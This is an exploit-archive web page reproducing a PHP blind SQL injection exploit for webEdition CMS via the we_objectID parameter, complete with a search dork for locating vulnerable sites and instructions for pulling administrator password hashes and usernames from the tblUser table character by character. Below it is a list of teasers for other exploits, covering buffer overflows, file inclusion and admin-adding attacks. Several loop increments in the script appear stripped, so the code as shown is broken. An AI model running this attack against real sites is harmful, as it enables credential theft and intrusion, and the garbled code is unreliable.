webEdition CMS (we_objectID) Blind SQL Injection Exploit

所属分类: 网络安全 / Exploit 阅读数: 190
收藏 0 赞 0 分享
<?php
ini_set("max_execution_time",0);
print_r('
###############################################################
#
# WebEdition CMS - Blind SQL Injection Exploit
#
# Vulnerability discovered by: Lidloses_Auge
# Exploit coded by: Lidloses_Auge
# Special Greetz to: H4x0r007 (who sent me a vulnerable Page)
# Greetz to: -=Player=- , Suicide, g4ms3, enco,
# GPM, Free-Hack, Ciphercrew, h4ck-y0u
# Date: 20.08.2008
#
###############################################################
#
# Dork: inurl:we_objectID=
# Admin Panel: [Target]/webEdition/
# Usage: php '.$argv[0].' [Target] [Userid]
# Example for http://www.site.com/en/****.php?we_objectID=21
# => php '.$argv[0].' http://www.site.com/en/****.php?we_objectID=21 1
#
###############################################################
');
if ($argc > 1) {
$url = $argv[1];
if ($argc < 3) {
$userid = 1;
} else {
$userid = $argv[2];
}
$r = strlen(file_get_contents($url."'and 1=1/*"));
echo "\nExploiting:\n";
$w = strlen(file_get_contents($url."'and 1=0/*"));
$t = abs((100-($w/$r*100)));
echo "Password: ";
for ($j = 1; $j <= 32; $j ) {
for ($i = 46; $i <= 102; $i=$i 2) {
if ($i == 60) {
$i = 98;
}
$laenge = strlen(file_get_contents($url."'and ascii(substring((select passwd from tblUser where id=".$userid." limit 0,1),".$j.",1))>".$i."/*"));
if (abs((100-($laenge/$r*100))) > $t-1) {
$laenge = strlen(file_get_contents($url."'and ascii(substring((select passwd from tblUser where id=".$userid." limit 0,1),".$j.",1))>".($i-1)."/*"));
if (abs((100-($laenge/$r*100))) > $t-1) {
echo chr($i-1);
} else {
echo chr($i);
}
$i = 102;
}
}
}
echo "\nUsername: ";
for ($i=1; $i <= 30; $i ) {
$laenge = strlen(file_get_contents($url."'and ascii(substring((select username from tblUser where id=".$userid." limit 0,1),".$i.",1))!=0/*"));
if (abs((100-($laenge/$r*100))) > $t-1) {
$count = $i;
$i = 30;
}
}
for ($j = 1; $j < $count; $j ) {
for ($i = 46; $i <= 122; $i=$i 2) {
if ($i == 60) {
$i = 98;
}
$laenge = strlen(file_get_contents($url."'and ascii(substring((select username from tblUser where id=".$userid." limit 0,1),".$j.",1))>".$i."/*"));
if (abs((100-($laenge/$r*100))) > $t-1) {
$laenge = strlen(file_get_contents($url."'and ascii(substring((select username from tblUser where id=".$userid." limit 0,1),".$j.",1))>".($i-1)."/*"));
if (abs((100-($laenge/$r*100))) > $t-1) {
echo chr($i-1);
} else {
echo chr($i);
}
$i = 122;
}
}
} } else {
echo "\nExploiting failed: Not enough arguments?\n";
}
?>

更多精彩内容其他人还在看

Download Accelerator Plus - DAP 8.x m3u File Buffer Overflow Exploit (c)

#include <stdio.h> #include <stdlib.h> /* DAP 8.x (.m3u) File BOF C Exploit for XP SP2,SP3 English SecurityFocus
收藏 0 赞 0 分享

OllyDBG v1.10 and ImpREC v1.7f (export name) BOF PoC

;-------------------------------------------------------------------------; ; OllyDBG v1.10 and ImpREC v1.7f export name buffer overflow
收藏 0 赞 0 分享

Download Accelerator Plus - DAP 8.x (m3u) Local BOF Exploit 0day

#!/usr/bin/python # Download Accelerator Plus - DAP 8.x (m3u) 0day Local Buffer Overflow Exploit # Bug discovered by Krystian Kloskows
收藏 0 赞 0 分享

Dreampics Builder (page) Remote SQL Injection Vulnerability

######################################################### # # PICS BUILDER (page) SQL Injection Vulnerability #================
收藏 0 赞 0 分享

BoonEx Ray 3.5 (sIncPath) Remote File Inclusion Vulnerability

# Name Of Script : Ray # Version : 3.5 # Download From : http://get.boonex.com/Ray-v.3.5-Suite-Free # Found By : RoMaNc
收藏 0 赞 0 分享

AuraCMS

#!/usr/bin/perl # k1tk4t Public Security Advisory # //////////////////////////////////////////////////////////// # AuraCMS <= 2.
收藏 0 赞 0 分享

Joomla Component com_content 1.0.0 (ItemID) SQL Injection Vuln

------------------------------------------------------------------------------------------- Joom
收藏 0 赞 0 分享

Mole Group Last Minute Script

-[*] ================================================================================ [*]- -[*] Last Minute Script <= 4.0 Remo
收藏 0 赞 0 分享

BrewBlogger 2.1.0.1 Arbitrary Add Admin Exploit

#!/usr/bin/perl #================================================= # BrewBlogger 2.1.0.1 Arbitrary Add Admin Exploit #================
收藏 0 赞 0 分享

Boonex Dolphin 6.1.2 Multiple Remote File Inclusion Vulnerabilities

# Name Of Script : Dolphin PHP # Version : 6.1.2 # Download From : http://heanet.dl.sourceforge.net/sourceforge/boonex-dolphin/Dol
收藏 0 赞 0 分享
查看更多